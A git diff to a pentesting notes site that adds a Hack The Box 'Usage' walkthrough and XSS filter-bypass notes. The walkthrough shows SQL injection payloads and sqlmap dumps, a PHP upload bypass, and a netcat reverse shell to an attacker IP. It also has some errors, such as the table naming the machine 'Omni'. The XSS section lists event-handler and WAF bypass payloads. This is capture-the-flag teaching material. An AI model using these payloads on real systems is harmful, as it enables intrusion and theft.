HTB Usage walkthrough: user flag

docs/htb-usage.md

@@ -0,0 +1,189 @@
+---
+title: Walkthrough - Usage - A HackTheBox machine
+author: amandaguglieri
+draft: false
+TableOfContents: true
+tags:
+  - walkthrough
+---
+
+
+# Walkthrough - Usage, a Hack The Box machine
+
+## About the machine
+
+![Omni Machine Banner](img/omni.png)
+
+
+
+| data       |                                                  |
+| ---------- | ------------------------------------------------ |
+| Machine    | Omni                                             |
+| Platform   | Hackthebox                                       |
+| url        | [link](https://app.hackthebox.com/machines/Omni) |
+| OS         | Linux                                            |
+| Difficulty | Easy                                             |
+| Points     | 20                                               |
+| ip         | 10.10.11.18                                      |
+
+
+
+## Getting user.txt flag
+
+### Enumeration
+
+```bash
+sudo nmap -sV -sC $ip -p-
+```
+
+Results:
+ Port 22 and 80.
+
+
+### Browsing the app
+
+After entering in http://10.10.11.18, a dns error is displayed. The page is redirected to http://usage.htb.
+
+I will add that line in my host resolver config file.
+
+```bash
+# testing for an existing file
+echo "10.10.11.18    http://usage.htb" >> /etc/hosts
+```
+
+The application is simple. A Login pannel with a "Remember your password" link. An other links to an admin login pannel and a logout feature. Enumeration techniques also gives us some ideas about Laravel framework being in use.
+
+After testing the login form and the remember your password form, I can detect a SQL injection vulnerability in the remember your password form.
+
+Previously I registered a user [email protected].
+
+![Step](img/htb-usage6.png)
+
+Payloads for manual detection:
+
+```
+[email protected]' AND 1=1;-- -
+```
+
+![Step](img/htb-usage6.png)
+
+
+```
+[email protected]' AND 1=1;-- -
+```
+
+![Step](img/htb-usage7.png)
+
+Now, we know that we have a SQL injection, Blind with the AND Boolean technique, so we can use sqlmap with --technique flag set to BUT. We can also save time using the flag `--dbms` to indicate that is a mysql database:
+
+
+```
+sqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch --dbs --dump --threads 3
+
+sqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch -D usage_blog --tables --dump --threads 3
+
+sqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch -D usage_blog -T admin_users --dump --threads 3
+```
+
+
+#### Upload a reverse shell
+
+The admin profile can be edited. The upload feature for the avatar image is vulnerable. 
+
+First, I tried to upload a php file, but files extensions are sanitized client side.
+
+![Step](img/htb-usage1.png)
+
+
+Then, I uploaded a php reverse shell file using jpg extension. The file was uploaded but it was not executable.
+![Step 2](img/htb-usage2.png)
+
+
+Finally I used Burpsuite and intercepted the upload of my ivan.jpg file. During the interception I modified the extension to php.
+
+![Step](img/htb-usage3.png)
+
+
+Finally the reverse shell worked. But for a limited period of time (see steps 1 and 2). Time enough to set up a hook and establish a new connection (see steps 2 and 3) with a  [bash reverse shell](reverse-shells.md)
+
+```
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 4444 >/tmp/f
+```
+
+
+
+![Step](img/htb-usage4.png)
+
+
+#### Getting user.txt
+
+First, I spawned a shell:
+
+```
+SHELL=/bin/bash script -q /dev/null
+```
+
+and printed out the flag:
+
+```
+cat /home/dash/user.txt
+```
+
+
+## Getting root.txt
+
+First, I perform a lateral movement to the other user present in the machine. For that I cat the /etc/passwd file and I run linpeas.sh script in the machine. 
+
+### Lateral movement
+
+Enumerate other users with access to a bash terminal:
+
+```
+cat /etc/passwd | grep -E ^*/bin/bash$
+```
+
+Results:
+
+```
+root:x:0:0:root:/root:/bin/bash
+dash:x:1000:1000:dash:/home/dash:/bin/bash
+xander:x:1001:1001::/home/xander:/bin/bash
+```
+
+
+Upload the script [linpeas](linpeas.sh) to the victims machine.
+
+```
+################
+# In the attacker machine
+###############
+# Download the script from the release page
+curl https://github.com/peass-ng/PEASS-ng/releases/download/20240414-ed0a5fac/linpeas.sh
+
+# Copy the file to the root of your apache server
+cp linpeas.sh /var/wwww/html
+
+# Start your server 
+service apache2 start
+# Turn it off once you have served your file
+
+################
+# From the victim machine
+################
+# Download the script from the release page or from the attacker server
+wget http://attackerIP/linpeas.sh
+
+# Run the script
+chmod +x linpeash.sh
+./linpeas.sh
+```
+
+
+
+
+Some interesting takeaways from the linpeas.sh results:
+
+![Step](img/htb-usage8.png)
+
+
+![Step](img/htb-usage9.png)

docs/spawn-a-shell.md

@@ -148,10 +148,14 @@ $ fg
 
 ```bash
 # In reverse shell
-$ reset
-$ export SHELL=bash
-$ export TERM=xterm-256color
-$ stty rows <num> columns <cols>
+reset
+export SHELL=bash
+export TERM=xterm-256color
+stty rows <num> columns <cols>
+
+# In one line:
+reset; export SHELL=bash; export TERM=xterm-256color; stty rows <num> columns <cols>
+
 ```
 
 ### msfvenom

docs/walkthroughs.md

@@ -99,6 +99,7 @@ It feels like an eternity since I embarked on my first walkthroughs of the Overt
 -   [HTB trick](htb-trick.md)
 -   [HTB undetected](htb-undetected.md)
 -   [HTB unified](htb-unified.md)
+-   [HTB usage](htb-usage.md)
 -   [HTB vaccine](htb-vaccine.md)
 
 

docs/webexploitation/cross-site-scripting-xss.md

@@ -223,7 +223,7 @@ Firstly, some common escaping characters that may be parsed (and you need to fur
 
 Additionally, there might exist a filter for the characters `script`. Being that the case: 
 
-**1.** Insert unexpected variations in the syntax such as random capitalization, blank spaces...: 
+**1.** Insert unexpected variations in the syntax such as random capitalization, blank spaces, new lines...: 
 
 ```
 "><script >alert(document.cookie)</script >
@@ -256,7 +256,7 @@ Double encoding is very effective. I've run into cases in the wild.
 <svg><x><script>alert('1'&#41</x>
 ```
 
-**5.** Unexpected weird attributes:
+**5.** Unexpected weird attributes, null bytes:
 
 ```
 <script x>
@@ -347,6 +347,54 @@ onmousehover
 
 See complete reference at: [https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
 
+**2.** Sometimes the events are filtered. This is a very common regex for filtering:
+
+```
+(on\w+\s*=)
+```
+
+Bypassing it:
+
+```
+<svg/onload=alert(1)>
+<svg//////onload=alert(1)>
+<svg id=x;onload=alert(1)>
+<svg id='x'onload=alert(1)>
+```
+
+**3.** Bettering up the filter:
+
+```
+(?i)([\s\"'`;\/0-9\=]+on\w+\s*=)
+```
+
+Bypassing it:
+
+```
+<svg onload%09=alert(1)>
+<svg %09onload=alert(1)>
+<svg %09onload%09=alert(1)>
+<svg onload%09%20%28%2c%3B=alert(1)>
+<svg onload%0B=alert(1)>
+```
+
+![escaping onload](../img/onload.png)
+
+[https://shazzer.co.uk/vectors](https://shazzer.co.uk/vectors) is a great resource to see potential attack vectors. 
+
+![Tool for seeing attacking vectors](../img/tool-xss.png)
+
+#### 1.4. Going beyond the `<script>`tag
+
+```
+<a href="javascript:alert(1)">click</a>
+<a href="data:text/html;base64,amF2YXNjcmlwdDphbGVyKDEp">click</a>
+<form action="javascript:alert(1)"><button>send</button></form>
+
+<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
+```
+
+
 
 ### 2. Bypassing the HTTPOnly flag
 
@@ -396,6 +444,13 @@ Modern browsers block the HTTP TRACE method in XMLHttpRequest and other scriptin
 An alternative to stealing protected cookies is to use the victim browser as a proxy. The Tunneling Proxy in [BeEF](../beef.md) exploits the XSS flaw and uses the victim browser to perform requests as the victim user to the web application. Basically, it tunnels requests through the hooked browser. By doing so, there is no way for the web application to distinguish between requests coming from legitimate user and requests forged by an atacker. 
 BeEF allows you to bypass other web developer protection techniques such as using multiple validations (User-agent, custom headers,...)
 
+### Bypassing WAFs
+
+#### ModSecurity
+
+```
+<svg onload='new Function`[“_Y000!_”].find(al\u0065rt)`'>
+```
 
 ## Examples of typical attacks
 ### 1. Cookie stealing: examples and techniques
@@ -583,11 +638,8 @@ window.setInterval(function()) {
 
 	}
 }, 1000; // WHEN > sends the key strokes every second
-
-
 ```
 
-
 Additionally, we have the [metasploit](../metasploit.md) module auxiliary(http_javascript_keylogger), an advance version of the previous javascript code. It creates the Javascript payload with a keylogger, which could be injected within the vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true.
 
 ### 5. Network attacks
@@ -596,6 +648,15 @@ A way to enter within intranet networks is by passing through HTTP traffic that,
 
 **1.** IP detection
 
+The first step before putting your feet in a network is to retrieve as much network information as possible about the hooked browser. For instance by revealing its internal IP address and subnet.
+
+>Traditionally, this required the use of external browser's pluggins such as Java JRE and some interaction from the victim: 
+>- Installing **My Address Java Applet**:  Unsigned java applet that retrieves IP. 
+>- Changing the java security settings enabling or reducing the security level).
+
+Use of **https://net.ipcalf.com/** , that abuses WebRTC HTML5 feature.
+
+
 **2.** Subnet detection
 
 **3.** Ping Sweeping

mkdocs.yml

@@ -258,6 +258,7 @@ nav:
       - HTB trick: htb-trick.md
       - HTB undetected: htb-undetected.md
       - HTB unified: htb-unified.md
+      - HTB usage: htb-usage.md
       - HTB vaccine: htb-vaccine.md
     - Beginners' guide:
       - Setting up a server: servers.md